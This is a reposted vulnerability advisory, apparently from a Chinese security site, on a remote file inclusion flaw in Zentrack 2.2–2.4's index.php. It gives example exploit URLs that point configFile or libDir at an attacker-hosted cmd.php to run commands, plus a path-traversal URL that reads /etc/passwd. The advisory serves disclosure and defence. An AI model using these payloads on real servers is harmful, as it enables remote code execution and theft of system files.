Zentrack 2.2/2.3/2.4 – ‘index.php’ Remote File Inclusion

Zentrack 2.2/2.3/2.4 – ‘index.php’ Remote File Inclusion

漏洞ID 1053939 漏洞类型
发布时间 2003-06-06 更新时间 2003-06-06
图片[1]-Zentrack 2.2/2.3/2.4 – ‘index.php’ Remote File Inclusion-安全小百科CVE编号 N/A
图片[2]-Zentrack 2.2/2.3/2.4 – ‘index.php’ Remote File Inclusion-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22750
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7843/info

A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL.

If the remote file is a malicious PHP script, this may allow for the execution of attacker-supplied PHP code with the privileges of the web server. Successful exploitation may provide unauthorized remote access to the attacker. This issue may also be exploited to remotely view files on the vulnerable host.

http://www.example.com/zentrack/index.php?configFile=http://[attacker]/cmd.php?
cmd=pwd

http://www.example.com/zentrack/www/index.php?libDir=http://
[attacker]/test/&cmd=pwd

http://www.exmaple.com/zentrack/index.php?configFile=/../../../../../etc/passwd

相关推荐: Jetty Double-Slash Request Arbitrary File Access Vulnerability

Jetty Double-Slash Request Arbitrary File Access Vulnerability 漏洞ID 1102352 漏洞类型 Input Validation Error 发布时间 2002-03-25 更新时间 2002-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享